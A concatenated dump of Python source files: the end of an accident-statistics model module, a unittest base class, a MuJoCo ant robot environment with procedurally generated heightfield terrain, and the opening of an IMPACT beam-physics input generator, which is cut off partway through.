iterator_accidents = it.newIterator(day_accidents)\n while it.hasNext(iterator_accidents):\n \n accidents = it.next(iterator_accidents)\n criteria_dictkey = accidents[criteria]\n if criteria_dictkey not in dictionary:\n dictionary[criteria_dictkey] = 1\n else:\n dictionary[criteria_dictkey] = dictionary[criteria_dictkey] + 1\n\n num_accidents_in_day = lt.size(day_accidents) \n num_accidents_in_range = num_accidents_in_range + num_accidents_in_day \n \n if num_accidents_in_day > more_accidents: \n more_accidents = num_accidents_in_day\n more_accidents_day = day\n i = i + 1\n\n max_dict_value = 0\n dictionary_keys = dictionary.keys()\n\n for value in dictionary_keys: \n num_value = dictionary[value]\n if num_value > max_dict_value:\n max_dict_value = num_value\n max_value = value\n\n return max_value , dictionary[max_value] , more_accidents_day , num_accidents_in_range\n\ndef getState(catalog,initial_date,final_date):\n \"\"\"\n Reto3 - Req4\n Retorna el estado con más accidentes\n \"\"\" \n criteria = \"State\"\n accidents_in_range = auxiliardelaauxiliar(catalog,initial_date,final_date)\n if accidents_in_range != None:\n accidents_in_range_by_criteria = Impresoradatosreq4(catalog,initial_date,final_date,accidents_in_range,criteria)\n return accidents_in_range_by_criteria\n return None\n\ndef yearsSize(catalog):\n \"\"\"\n Reto3 - Req1 \n Número de fechas en las que ocurrieron accidentes de todos los años.\n \"\"\" \n Año1=om.size(catalog[\"2016\"])\n Año2=om.size(catalog[\"2017\"])\n Año3=om.size(catalog[\"2018\"])\n Año4=om.size(catalog[\"2019\"])\n Año5=om.size(catalog[\"2020\"])\n return Año1 + Año2 + Año3 + Año4, Año5\n\ndef YearSize_1(catalog):\n \"\"\"\n Reto3 - Req1 \n Número de fechas en las que ocurrieron accidentes de\n cada año.\n \"\"\" \n Año1=om.size(catalog[\"2016\"])\n Año2=om.size(catalog[\"2017\"])\n Año3=om.size(catalog[\"2018\"])\n Año4=om.size(catalog[\"2019\"])\n Año5=om.size(catalog[\"2020\"])\n return Año1 , Año2 , Año3 , Año4, Año5\n\ndef accidentsSize(catalog):\n \"\"\"\n Reto3 - Req1 \n Número de accidentes.\n \"\"\" \n return lt.size(catalog[\"accidents\"])\n\ndef YearHeight_1(catalog):\n \"\"\"\n Reto3 - Req1 \n Altura del árbol de cada año.\n \"\"\" \n Año1=om.size(catalog[\"2016\"])\n Año2=om.size(catalog[\"2017\"])\n Año3=om.size(catalog[\"2018\"])\n Año4=om.size(catalog[\"2019\"])\n Año5=om.size(catalog[\"2020\"])\n\n return Año1, Año2, Año3, Año4, Año5\n\ndef statesSize(catalog):\n \"\"\"\n Reto3 - Req4\n Número de estados cargados.\n \"\"\"\n return m.size(catalog[\"States\"])\n\n# ==============================\n# Funciones de Comparacion\n# ==============================\n\ndef CompareSeverity_prueba(severity_accident1,severity_accident2):\n \"\"\"\n Compara la gravedad de accidentes. \n \"\"\"\n severity_accident2 = me.getKey(severity_accident2)\n if (severity_accident1 == severity_accident2):\n return 0\n elif (severity_accident1 > severity_accident2):\n return 1\n else:\n return -1\n\ndef CompareDates_Final(date1,date2):\n \"\"\"\n Compara dos fechas de accidentes en años específicos.\n \"\"\"\n if (date1 == date2):\n return 0\n elif (date1 > date2):\n return 1\n else:\n return -1\n\ndef compareAccidentsId(id1,id2):\n \"\"\"\n Compara dos Ids de accidentes. \n \"\"\"\n if (id1 == id2):\n return 0\n elif (id1 > id2):\n return 1\n else:\n return -1\n\n","sub_path":"App/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":12904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"504559825","text":"import unittest\nfrom .test_data import HistoryTestData\n\nclass TestBase(unittest.TestCase):\n \"\"\"Base class for testing\"\"\"\n \n @classmethod\n def setUpClass(cls):\n cls.data_reader = HistoryTestData()\n cls.history = cls.data_reader.get()\n cls.history_other = cls.data_reader.get_compare()\n cls.history_bad = cls.data_reader.get_bad()\n\n cls.converge_quantities = (5, 20, 30, 50, 75, 100, 120, 150, 200, 250, 350, 500, 600, 700, 800, 900, 1000)\n\n @classmethod\n def tearDownClass(cls):\n cls.data_reader = None\n cls.history = None\n cls.history_other = None\n cls.history_bad = None\n","sub_path":"wraps/python/tests/TestBase.py","file_name":"TestBase.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"77416412","text":"import numpy as np\nimport mujoco_py\n# from nexabots.src import my_utils as my_utils\nimport os\nimport cv2\nfrom gym.utils import seeding\nfrom collections import namedtuple\nfrom scipy import ndimage\nfrom math import acos\nfrom opensimplex import OpenSimplex\nimport math\nimport time\n\nEnv_config = namedtuple('Env_config', [\n 'name',\n 'ground_roughness',\n 'pit_gap',\n 'stump_width', 'stump_height', 'stump_float',\n 'stair_height', 'stair_width', 'stair_steps'\n])\n\n_HEIGHTFIELD_ID = 0\n_TERRAIN_SMOOTHNESS = 0.15 # 0.0: maximally bumpy; 1.0: completely smooth.\n_TERRAIN_BUMP_SCALE = 2 # Spatial scale of terrain bumps (in meters).\n_DEFAULT_VALUE_AT_MARGIN = 0.1\n\nSCALE = 30.0 # affects how fast-paced the game is, forces should be adjusted as well\n\nVIEWPORT_W = 600\nVIEWPORT_H = 400\n\nTERRAIN_STEP = 14 / SCALE\nTERRAIN_LENGTH = 100000 # in steps\nTERRAIN_HEIGHT = VIEWPORT_H / SCALE / 4\n# TERRAIN_HEIGHT = 1.0\nTERRAIN_GRASS = 10 # low long are grass spots, in steps\nTERRAIN_STARTPAD = 100 # in steps\n\nclass AntTerrain:\n def __init__(self, animate=False, sim=None, camera=False, heightfield=True):\n if camera:\n import cv2\n self.prev_img = np.zeros((24,24))\n\n if sim is not None:\n self.sim = sim\n self.model = self.sim.model\n else:\n self.modelpath = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"assets/ant_blind.xml\")\n self.model = mujoco_py.load_model_from_path(self.modelpath)\n self.sim = mujoco_py.MjSim(self.model)\n\n self.env_config = None\n self.env_params = None\n self.env_seed = None\n self._seed()\n\n self._healthy_z_range = (0.2, 1.0)\n self._z_reward_weight = 0.05\n self._healthy_reward = 1.0 * self._z_reward_weight\n self._terminate_when_unhealthy = False\n self._contact_force_range = (-1.0, 1.0)\n self._ctrl_cost_weight = 0.3 #0.5\n self._contact_cost_weight = 5e-4\n self.forward_weight = 70\n self.sum_reward = 0.0\n self.reward_threshold = 3000.0\n\n # External parameters\n self.joints_rads_low = np.array([-0.2, -0.6, -0.6] * 4)\n self.joints_rads_high = np.array([0.6, 0.6, 0.6] * 4)\n self.joints_rads_diff = self.joints_rads_high - self.joints_rads_low\n self.target_vel = 0.5 # Target velocity with which we want agent to move\n self.max_steps = 3000\n self.over = 0\n\n self.camera = camera\n self.animate = animate\n self.HF = heightfield\n\n # if self.HF:\n # self.hf_data = self.model.hfield_data\n # self.hf_ncol = self.model.hfield_ncol[0]\n # self.hf_nrow = self.model.hfield_nrow[0]\n # self.hf_size = self.model.hfield_size[0]\n # self.hf_grid = self.hf_data.reshape((self.hf_nrow, self.hf_ncol))\n # self.hf_grid_aug = np.zeros((self.hf_nrow * 2, self.hf_ncol * 2))\n # self.hf_grid_aug[:self.hf_nrow, :self.hf_ncol] = self.hf_grid\n # self.hf_m_per_cell = float(self.hf_size[1]) / self.hf_nrow\n # self.rob_dim = 0.5\n # self.hf_res = int(self.rob_dim / self.hf_m_per_cell)\n # self.hf_offset_x = 4\n # self.hf_offset_y = 3\n # self._healthy_z_range = (0.2, 0.5+np.max(self.model.hfield_data))\n\n self.model.opt.timestep = 0.02\n\n # Environment dimensions\n self.q_dim = self.sim.get_state().qpos.shape[0]\n self.qvel_dim = self.sim.get_state().qvel.shape[0]\n\n self.obs_dim = self.q_dim + self.qvel_dim - 2 + 4 + (24**2) * 2 # x,y not present, + 4contacts\n self.act_dim = self.sim.data.actuator_length.shape[0]\n\n # Environent inner parameters\n self.viewer = None\n self.step_ctr = 0\n\n if camera:\n self.cam_viewer = mujoco_py.MjRenderContextOffscreen(self.sim, 0)\n\n self.frame_list = []\n\n # Initial methods\n if animate:\n self.setupcam()\n\n self.reset()\n\n def seed(self, seed=None):\n return self._seed(seed)\n\n def _seed(self, seed=None):\n self.env_seed = seed\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def set_env_config(self, env_config):\n self.config = env_config\n\n def augment(self, params):\n self.env_params = params\n\n def state_vector(self):\n return np.concatenate([\n self.sim.data.qpos.flat,\n self.sim.data.qvel.flat\n ])\n\n @property\n def is_healthy(self):\n state = self.state_vector()\n min_z, max_z = self._healthy_z_range\n is_healthy = (np.isfinite(state).all() and min_z <= state[2] <= max_z)\n return is_healthy\n\n @property\n def healthy_reward(self):\n return float(\n self.is_healthy\n or self._terminate_when_unhealthy\n ) * self._healthy_reward\n\n def control_cost(self, action):\n control_cost = self._ctrl_cost_weight * np.sum(np.square(action))\n return control_cost\n\n @property\n def contact_forces(self):\n raw_contact_forces = self.sim.data.cfrc_ext\n min_value, max_value = self._contact_force_range\n contact_forces = np.clip(raw_contact_forces, min_value, max_value)\n return contact_forces\n\n @property\n def contact_cost(self):\n contact_cost = self._contact_cost_weight * np.sum(\n np.square(self.contact_forces))\n return contact_cost\n\n\n def setupcam(self):\n if self.viewer is None:\n self.viewer = mujoco_py.MjViewer(self.sim)\n self.viewer.cam.trackbodyid = -1\n self.viewer.cam.distance = self.model.stat.extent * 1.3\n self.viewer.cam.lookat[0] = -0.1\n self.viewer.cam.lookat[1] = 0\n self.viewer.cam.lookat[2] = 0.5\n self.viewer.cam.elevation = -20\n\n def get_no_cont_penlty(self):\n c_forces = []\n # print(self.model.geom_names)\n penetration = 0\n touch = 0\n no_touch_penlty = 0.0\n penetration_penlty = 0.0\n body_penlty = 0.0\n # print(self.model.geom_contype)\n for i in range(self.sim.data.ncon):\n contact = self.sim.data.contact[i]\n if ((self.model.geom_id2name(contact.geom1) == 'left_ankle_geom'\n or self.model.geom_id2name(contact.geom1) == 'right_ankle_geom'\n or self.model.geom_id2name(contact.geom1) == 'third_ankle_geom'\n or self.model.geom_id2name(contact.geom1) == 'fourth_ankle_geom') and self.model.geom_id2name(contact.geom2) == 'floor') or \\\n ((self.model.geom_id2name(contact.geom2) == 'left_ankle_geom'\n or self.model.geom_id2name(contact.geom2) == 'right_ankle_geom'\n or self.model.geom_id2name(contact.geom2) == 'third_ankle_geom'\n or self.model.geom_id2name(contact.geom2) == 'fourth_ankle_geom') and self.model.geom_id2name(contact.geom1) == 'floor'):\n\n if contact.dist < 0:\n penetration += 1\n else:\n touch += 1\n if (self.model.geom_id2name(contact.geom1) == 'floor' and self.model.geom_id2name(contact.geom2) == 'torso_geom') or \\\n (self.model.geom_id2name(contact.geom2) == 'floor' and self.model.geom_id2name(\n contact.geom1) == 'torso_geom'):\n body_penlty = 1.0\n # c_array = np.zeros(6, dtype=np.float64)\n # mujoco_py.functions.mj_contactForce(self.model, self.sim.data, i, c_array)\n # # Convert the contact force from contact frame to world frame\n # ref = np.reshape(contact.frame, (3, 3))\n # c_force = np.dot(np.linalg.inv(ref), c_array[0:3])\n # # print('contact force in world frame:', c_force)\n # c_forces.append(c_force)\n if touch == 0:\n no_touch_penlty = 1.0\n elif penetration > 0:\n penetration_penlty = 1.0 * penetration\n return no_touch_penlty + penetration_penlty + body_penlty\n\n def get_obs(self):\n qpos = self.sim.get_state().qpos.tolist()\n qvel = self.sim.get_state().qvel.tolist()\n a = qpos + qvel\n return np.asarray(a, dtype=np.float32)\n\n def get_obs_dict(self):\n od = {}\n\n od['rangefinder'] = self.rangefinder()\n od['contact_sensors'] = self.contact_sensor()\n\n # Intrinsic parameters\n for j in self.sim.model.joint_names:\n od[j + \"_pos\"] = self.sim.data.get_joint_qpos(j)\n od[j + \"_vel\"] = self.sim.data.get_joint_qvel(j)\n\n # Height field\n if self.HF:\n od[\"hf\"] = self.get_local_hf(*od[\"root_pos\"][0:2])\n\n if self.camera:\n # On board camera input\n cam_array = self.sim.render(camera_name=\"frontal\", width=24, height=24)\n img = cv2.cvtColor(np.flipud(cam_array), cv2.COLOR_BGR2GRAY)\n od['cam'] = img\n\n # Contacts:\n od['contacts'] = np.clip(np.square(np.array(self.sim.data.cfrc_ext[[4, 7]])).sum(axis=1), 0, 1)\n\n return od\n\n def get_the_hf(self, x, y):\n x_coord = int((x + self.hf_offset_x) * 5)\n y_coord = int((y + self.hf_offset_y) * 5)\n # print('x_coord', x_coord)\n return self.hf_grid_aug[y_coord-1:y_coord+1, x_coord-1:x_coord+1]\n\n def get_local_hf(self, x, y):\n x_coord = int((x + self.hf_offset_x) * 5)\n y_coord = int((y + self.hf_offset_y) * 5)\n return self.hf_grid_aug[y_coord - self.hf_res: y_coord + self.hf_res,\n x_coord - self.hf_res: x_coord + self.hf_res]\n\n def get_state(self):\n return self.sim.get_state()\n\n def set_state(self, qpos, qvel=None):\n qvel = np.zeros(self.qvel_dim) if qvel is None else qvel\n old_state = self.sim.get_state()\n new_state = mujoco_py.MjSimState(old_state.time, qpos, qvel,\n old_state.act, old_state.udd_state)\n self.sim.set_state(new_state)\n self.sim.forward()\n\n def render(self, human=True):\n if self.viewer is None:\n self.viewer = mujoco_py.MjViewer(self.sim)\n if not human:\n return self.sim.render(camera_name=None,\n width=224,\n height=224,\n depth=False)\n self.viewer.render()\n\n def get_body_com(self, body_name):\n return self.sim.data.get_body_xpos(body_name)\n\n def get_sensor(self):\n return self.sim.data.sensordata\n\n def rangefinder(self):\n rf_readings = self.get_sensor()[4:]\n no_intersection = -1.0\n return np.where(rf_readings == no_intersection, 1.0, np.tanh(rf_readings))\n def contact_sensor(self):\n contacts = self.get_sensor()[:4]\n min_value, max_value = self._contact_force_range\n contacts = np.clip(contacts, min_value, max_value)\n return contacts\n\n def do_simulation(self, action, n_frames=1):\n self.sim.data.ctrl[:] = action\n self.sim.forward()\n for _ in range(n_frames):\n self.sim.step()\n\n def scale_action(self, action):\n return (np.array(action) * 0.5 + 0.5) * self.joints_rads_diff + self.joints_rads_low\n def scale_joints(self, joints):\n return ((np.array(joints) - self.joints_rads_low) / self.joints_rads_diff) * 2 - 1\n def get_agent_obs(self):\n qpos = self.sim.get_state().qpos.tolist()\n qvel = self.sim.get_state().qvel.tolist()\n contacts = np.array(self.sim.data.sensordata[0:4], dtype=np.float32)\n contacts[contacts > 0.05] = 1\n contacts[contacts <= 0.05] = -1\n if self.camera:\n cam_array = self.sim.render(camera_name=\"frontal\", width=64, height=64)\n img = cv2.cvtColor(np.flipud(cam_array), cv2.COLOR_BGR2GRAY)\n return np.concatenate((self.scale_joints(qpos[7:]), qvel[6:], qpos[3:7], qvel[:6], contacts))\n\n @property\n def dt(self):\n return self.model.opt.timestep\n\n def step(self, ctrl):\n obs_p = self.get_agent_obs()\n # print('self.get_body_com(\"torso\"): ', self.model.body_subtreemass)\n xy_position_before = self.get_body_com(\"torso\")[:2].copy()\n ctrl = np.clip(ctrl, -1, 1)\n ctrl_pen = np.square(ctrl).mean()\n ctrl = self.scale_action(ctrl)\n\n # Step the simulator\n self.sim.data.ctrl[:] = ctrl\n self.sim.forward()\n self.sim.step()\n self.step_ctr += 1\n\n xy_position_after = self.get_body_com(\"torso\")[:2].copy()\n xy_velocity = (xy_position_after - xy_position_before) / self.dt\n x_velocity, y_velocity = xy_velocity\n forward_reward = x_velocity\n\n # ctrl_cost = self.control_cost(action)\n # contact_cost = self.contact_cost\n # healthy_reward = self.healthy_reward\n\n bx, by, bz, qw, qx, qy, qz = self.sim.get_state().qpos.tolist()[:7]\n xd, yd, zd, thd, phid, psid = self.sim.get_state().qvel.tolist()[:6]\n\n # print(xd )\n # print('xy_velocity', xy_velocity)\n\n # Reward conditions\n velocity_rew = 1. / (abs(xd - self.target_vel) + 1.) - 1. / (self.target_vel + 1.)\n obs_c = self.get_agent_obs()\n # velocity_rew = obs_c[0] - obs_p[0]\n\n q_yaw = 2 * acos(qw)\n\n r = velocity_rew * 10 - \\\n np.square(q_yaw) * 0.5 - \\\n np.square(ctrl_pen) * 0.01 - \\\n np.square(zd) * 0.5\n # r = r*self.model.hfield_size[0,2]\n # print('velocity ', velocity_rew)\n # print('np.square(q_yaw) ', np.square(q_yaw))\n # print('np.square(ctrl_pen) ', np.square(ctrl_pen))\n # print('np.square(zd) * 0.5 ', np.square(zd) * 0.5)\n # print('obs_c[0] - obs_p[0] ', obs_c[0] - obs_p[0])\n\n self.sum_reward += r\n\n obs_dict = self.get_obs_dict()\n # obs = np.concatenate(\n # (obs_c.astype(np.float32)[2:], obs_dict[\"contacts\"], obs_dict['rangefinder'], obs_dict['contact_sensors']))\n\n if np.sum(obs_p[-4:]) == -4 and np.sum(obs_c[-4:]) == -4:\n self.over += 1\n else:\n self.over = 0\n\n # Reevaluate termination condition\n # done = self.step_ctr > self.max_steps # or abs(roll) > 0.8 or abs(pitch) > 0.8\n done = bz < 0 or self.step_ctr > self.max_steps or self.over > 100\n\n return obs_c, r, done, obs_dict\n #\n # def step(self, action):\n #\n # obs_p = self.get_obs()\n # self.do_simulation(action, n_frames=2)\n # self.step_ctr += 1\n #\n # #print(self.sim.data.ncon) # Prints amount of current contacts\n # obs_c = self.get_obs()\n # x,y,z = obs_c[0:3]\n #\n # cost = self.control_cost(action) + self.contact_cost\n # forward_reward = (obs_c[0] - obs_p[0]) * self.forward_weight\n #\n # obs_dict = self.get_obs_dict()\n # obs = np.concatenate((obs_c.astype(np.float32)[2:], obs_dict[\"contacts\"], obs_dict['rangefinder'], obs_dict['contact_sensors']))\n #\n # rewards = forward_reward - cost + self.healthy_reward\n #\n # if self.camera:\n # obs = np.concatenate((obs, obs_dict[\"cam\"].flatten(), self.prev_img.flatten()))\n # self.prev_img = obs_dict[\"cam\"]\n #\n # # Reevaluate termination condition\n # done = self.step_ctr > 1000 or z < 0.1\n #\n # return obs, rewards, done, obs_dict\n\n def reset(self):\n # if self.sum_reward > self.reward_threshold or self.step_ctr == 0:\n self.distroy_terrains()\n self.gen_terrains()\n # self.perlin()\n\n self.over = 0\n self.step_ctr = 0\n self.sum_reward = 0.0\n init_q = np.zeros(self.q_dim, dtype=np.float32)\n init_q[0] = np.random.randn() * 0.1\n init_q[1] = np.random.randn() * 0.1\n # init_q[2] = 0.80 + np.random.rand() * 0.1\n init_q[2] = min(np.max(self.get_local_hf(init_q[0], init_q[1])) + np.random.randn() * 0.1 + 0.2, self.model.hfield_size[0, 2]/2 + np.random.rand() * 0.1)\n init_qvel = np.random.randn(self.qvel_dim).astype(np.float32) * 0.1\n\n self.set_state(init_q, init_qvel)\n obs, _, _, _ = self.step(np.zeros(self.act_dim))\n\n # obs = np.concatenate((init_q, init_qvel)).astype(np.float32)\n obs_dict = self.get_obs_dict()\n # obs = np.concatenate((obs[2:], obs_dict[\"contacts\"], obs_dict['rangefinder'], obs_dict['contact_sensors']))\n\n if self.camera:\n obs = np.concatenate((obs, obs_dict[\"cam\"].flatten(), self.prev_img.flatten()))\n self.prev_img = obs_dict[\"cam\"]\n\n return obs\n\n def distroy_terrains(self):\n import glfw\n if self.viewer is not None:\n glfw.destroy_window(self.viewer.window)\n self.viewer = None\n res = self.model.hfield_nrow[_HEIGHTFIELD_ID]\n assert res == self.model.hfield_ncol[_HEIGHTFIELD_ID]\n start_idx = self.model.hfield_adr[_HEIGHTFIELD_ID]\n self.model.hfield_data[start_idx:start_idx+res*self.model.hfield_ncol[_HEIGHTFIELD_ID]] = np.zeros((res, res)).ravel()\n\n def gen_terrains(self):\n if self.model.hfield_size[0, 2] <= 2.2:\n self.model.hfield_size[0, 2] += 0.001\n level = np.random.uniform(0.5, 1.5, 1)\n res = self.model.hfield_nrow[_HEIGHTFIELD_ID]\n assert res == self.model.hfield_ncol[_HEIGHTFIELD_ID]\n # Sinusoidal bowl shape.\n row_grid, col_grid = np.ogrid[-1:1:res*1j, -1:1:res*1j]\n radius = np.clip(np.sqrt(col_grid**2 + row_grid**2), .04, 1)\n bowl_shape = level - np.cos(2*np.pi*radius)/2\n # Random smooth bumps.\n terrain_size = 2 * self.model.hfield_size[_HEIGHTFIELD_ID, 0]\n bump_res = int(terrain_size / _TERRAIN_BUMP_SCALE)\n bumps = np.random.uniform(_TERRAIN_SMOOTHNESS, 1, (bump_res, bump_res))\n smooth_bumps = ndimage.zoom(bumps, res / float(bump_res))\n terrain_bowl = bowl_shape * smooth_bumps\n if self.env_params is not None:\n # Terrain is elementwise product.\n terrain_bowl = (terrain_bowl - np.min(terrain_bowl)) / (np.max(terrain_bowl) - np.min(terrain_bowl)) * \\\n (self.model.hfield_size[_HEIGHTFIELD_ID, 2] - 0.0) + 0.0\n terrain = terrain_bowl * 0.3 + self._generate_terrain() * 0.7\n else:\n terrain = bowl_shape * smooth_bumps\n # terrain = self._generate_terrain()\n terrain = (terrain - np.min(terrain)) / (np.max(terrain) - np.min(terrain)) * (self.model.hfield_size[_HEIGHTFIELD_ID, 2] - 0.0) + 0.0\n\n # self.difficulty_meassure(terrain)\n\n start_idx = self.model.hfield_adr[_HEIGHTFIELD_ID]\n self.model.hfield_data[start_idx:start_idx+res*self.model.hfield_ncol[_HEIGHTFIELD_ID]] = terrain.ravel()\n # print('variance: ', np.var(terrain.ravel()))\n\n self.hf_data = self.model.hfield_data\n self.hf_ncol = self.model.hfield_ncol[0]\n self.hf_nrow = self.model.hfield_nrow[0]\n self.hf_size = self.model.hfield_size[0]\n self.hf_grid = self.hf_data.reshape((self.hf_nrow, self.hf_ncol))\n self.hf_grid_aug = np.zeros((self.hf_nrow * 2, self.hf_ncol * 2))\n self.hf_grid_aug[:self.hf_nrow, :self.hf_ncol] = self.hf_grid\n self.hf_m_per_cell = float(self.hf_size[1]) / self.hf_nrow\n self.rob_dim = 0.5\n self.hf_res = int(self.rob_dim / self.hf_m_per_cell)\n self.hf_offset_x = 10\n self.hf_offset_y = 20\n self._healthy_z_range = (0.2, 0.5 + np.max(self.model.hfield_data))\n\n def _generate_terrain(self):\n velocity = 0.0\n z_norm = 0.0\n terrain_z = []\n nrows = self.model.hfield_nrow[_HEIGHTFIELD_ID]\n ncols = self.model.hfield_ncol[_HEIGHTFIELD_ID]\n TERRAIN_HEIGHT = self.model.hfield_size[_HEIGHTFIELD_ID, 3]\n z = TERRAIN_HEIGHT\n for y in range(nrows):\n for x in range(ncols):\n nx = x * TERRAIN_STEP\n ny = y * TERRAIN_STEP\n # nx = x / nrows - 0.5\n # ny = y / ncols - 0.5\n velocity = 0.2 * velocity + 0.08 * np.sign(TERRAIN_HEIGHT - z)\n if self.env_params is not None and self.env_params.altitude_fn is not None:\n z += velocity\n if x < TERRAIN_STARTPAD:\n mid = ncols * _TERRAIN_BUMP_SCALE / 2.\n y_ = (ny - mid) * np.pi / mid\n x_ = (nx - mid) * np.pi / mid\n # y_ = ny/(200*TERRAIN_STEP) * 2 - 1\n # x_ = nx/(200*TERRAIN_STEP) * 2 - 1\n z = TERRAIN_HEIGHT + self.env_params.altitude_fn((x_, y_))[0]\n if y == TERRAIN_STARTPAD - 10 and x == TERRAIN_STARTPAD - 10:\n z_norm = self.env_params.altitude_fn((x_, y_))[0] / 2\n z -= z_norm\n\n # print(self.env_params.altitude_fn((x_, y_))[0])\n # # print('dd: ', .5 - np.cos(2 * np.pi * (np.sqrt(x_ ** 2 + y_ ** 2))) / 2)\n\n # z = (1.00 * (self.env_params.altitude_fn((1 * nx, 1 * ny))[0] / 2 + 0.5)\n # + 0.50 * self.env_params.altitude_fn((2 * nx, 2 * ny))[0]\n # + 0.25 * self.env_params.altitude_fn((4 * nx, 4 * ny))[0]\n # + 0.13 * self.env_params.altitude_fn((8 * nx, 8 * ny))[0]\n # + 0.06 * self.env_params.altitude_fn((16 * nx, 16 * ny))[0]\n # + 0.03 * self.env_params.altitude_fn((32 * nx, 32 * ny))[0])\n # z = z / (1.00 + 0.50 + 0.25 + 0.13 + 0.06 + 0.03)\n # if y == TERRAIN_STARTPAD + 1 or x == TERRAIN_STARTPAD + 1:\n # z_norm = self.env_params.altitude_fn((nx, ny))[0]\n else:\n if x < TERRAIN_STARTPAD:\n velocity += np.random.uniform(-1, 1) / SCALE\n z += _TERRAIN_SMOOTHNESS * velocity\n terrain_z.append(z)\n terrain_z = np.array(terrain_z).reshape(nrows,ncols)\n # terrain = terrain_z\n # print(np.var(terrain))\n terrain = (terrain_z - np.min(terrain_z)) / (np.max(terrain_z) - np.min(terrain_z)) * (self.model.hfield_size[_HEIGHTFIELD_ID,2] - 0.2) + 0.2\n return terrain\n\n def difficulty_meassure(self, terrain):\n data = terrain[99,60:]\n dist = np.abs(np.diff(data))\n with open(\"level.txt\", \"a+\") as file:\n # with open(\"/home/fang/project/thesis/ant_poet/poet/poet_distributed/niches/box2d/ant_terrain_mjc/level.txt\", \"a+\") as file:\n file.seek(0)\n tmp = file.read(100)\n if len(tmp) > 0:\n file.write(\"\\n\")\n file.write(str(np.max(dist)))\n file.close()\n\n def perlin(self):\n oSim = OpenSimplex(seed=int(time.time()))\n\n height = 200\n\n M = self.model.hfield_ncol[0]\n N = self.model.hfield_nrow[0]\n mat = np.zeros((M, N))\n\n scale_x = np.random.randint(30, 100)\n scale_y = np.random.randint(30, 100)\n octaves = 4 # np.random.randint(1, 5)\n persistence = np.random.rand() * 0.3 + 0.3\n lacunarity = np.random.rand() + 1.5\n\n for i in range(M):\n for j in range(N):\n for o in range(octaves):\n sx = scale_x * (1 / (lacunarity ** o))\n sy = scale_y * (1 / (lacunarity ** o))\n amp = persistence ** o\n mat[i][j] += oSim.noise2d(i / sx, j / sy) * amp\n\n wmin, wmax = mat.min(), mat.max()\n mat = (mat - wmin) / (wmax - wmin) * height\n\n if np.random.rand() < 0.3:\n num = np.random.randint(50, 120)\n mat = np.clip(mat, num, 200)\n if np.random.rand() < 0.3:\n num = np.random.randint(120, 200)\n mat = np.clip(mat, 0, num)\n\n # Walls\n mat[0, 0] = 255.\n mat = (mat - np.min(mat))/(np.max(mat) - np.min(mat)) * (self.model.hfield_size[_HEIGHTFIELD_ID,2] - 0.2) + 0.2\n start_idx = self.model.hfield_adr[_HEIGHTFIELD_ID]\n self.model.hfield_data[start_idx:start_idx + M * self.model.hfield_ncol[_HEIGHTFIELD_ID]] = mat.ravel()\n\n self.hf_data = self.model.hfield_data\n self.hf_ncol = self.model.hfield_ncol[0]\n self.hf_nrow = self.model.hfield_nrow[0]\n self.hf_size = self.model.hfield_size[0]\n self.hf_grid = self.hf_data.reshape((self.hf_nrow, self.hf_ncol))\n self.hf_grid_aug = np.zeros((self.hf_nrow * 2, self.hf_ncol * 2))\n self.hf_grid_aug[:self.hf_nrow, :self.hf_ncol] = self.hf_grid\n self.hf_m_per_cell = float(self.hf_size[1]) / self.hf_nrow\n self.rob_dim = 0.5\n self.hf_res = int(self.rob_dim / self.hf_m_per_cell)\n self.hf_offset_x = 10\n self.hf_offset_y = 20\n self._healthy_z_range = (0.2, 0.5 + np.max(self.model.hfield_data))\n\n # return mat, {\"height\": .2}\n\n def demo(self):\n self.reset()\n if self.HF:\n cv2.namedWindow(\"HF\")\n if self.camera:\n cv2.namedWindow(\"cam\")\n cv2.namedWindow(\"con\")\n\n for i in range(1000):\n _, _, _, od = self.step(np.random.randn(self.act_dim))\n\n # LED IDS: 4,7,10,13\n cv2.imshow(\"con\", np.array(self.sim.data.cfrc_ext[[4, 7, 10, 13]]))\n cv2.waitKey(1)\n\n if self.animate:\n self.render()\n\n if self.HF:\n hf = od['hf']\n cv2.imshow(\"HF\", np.flipud(hf))\n cv2.waitKey(1)\n\n if self.camera:\n cv2.imshow(\"cam\", cv2.resize(od['cam'], (24, 24)))\n cv2.waitKey(1)\n\nif __name__ == \"__main__\":\n ant = AntTerrain(animate=True, camera=False)\n ant.demo()\n\n","sub_path":"poet_distributed/niches/box2d/ant_terrain_mjc/ant_blind.py","file_name":"ant_blind.py","file_ext":"py","file_size_in_byte":25937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"396039734","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 20 21:23:03 2016\n\n@author: kilean\n\"\"\"\n# IMPACT input generator, output reader and plot \n# key data structure are 'beam' and 'element' dictionary\n\n\n###############################################################################\n###############################################################################\n### IMPACT INPUT GENERATOR ###\n###############################################################################\n###############################################################################\n#%%============================================================================\n# beam \n#==============================================================================\ndef getBeam() :\n \"\"\"\n get a template of a beam dictionary. \n units : \n mass : eV\n energy = kinetic energy : eV\n current : Ampere\n x00, x11, x01 : IMPACT internel dimension\n frequency : Hz\n phase : radian\n charge per mass = charge number / mass : 1/eV\n \"\"\"\n beam = {'mass': 938.27231e6, # eV/c^2\n 'energy': 150.0e6, # eV\n 'n_particles': 1,\n 'distribution id':3,\n 'restart flag':0,\n 'current' : 0.0, # ampere\n 'x00': 0.0, 'x11': 0.0, 'x01': 0.0, # IMPACT internel dimension\n 'y00': 0.0, 'y11': 0.0, 'y01': 0.0,\n 'z00': 0.0, 'z11': 0.0, 'z01': 0.0,\n 'frequency': 650.0e6, # Hz\n 'phase': 0.0, #radian\n 'charge per mass' : 0,\n 'mesh_x' : 16, 'mesh_y' : 16, 'mesh_z' : 16}\n \n beam['charge per mass']=1.0/beam['mass']\n return beam\n\ndef twiss2beam(beam,betx,alfx,norm_ex,bety,alfy,norm_ey,betz,alfz,norm_ez):\n \"\"\"\n update the beam distribution using twiss parameters \n !! IMPORTANT : energy and frequency must be updated before hand \n input \n beam = (dict) beam dictionary to be updated\n betx = beta-function in x-direction\n alfx = alpha-function in x-direction\n norm_ex = normalized emittance in x-direction \n betz = beta-function in z-direction\n alfz = alpha-function in z-direction\n norm_ez = normalized emittance in z-direction \n \"\"\"\n clight = 299792458 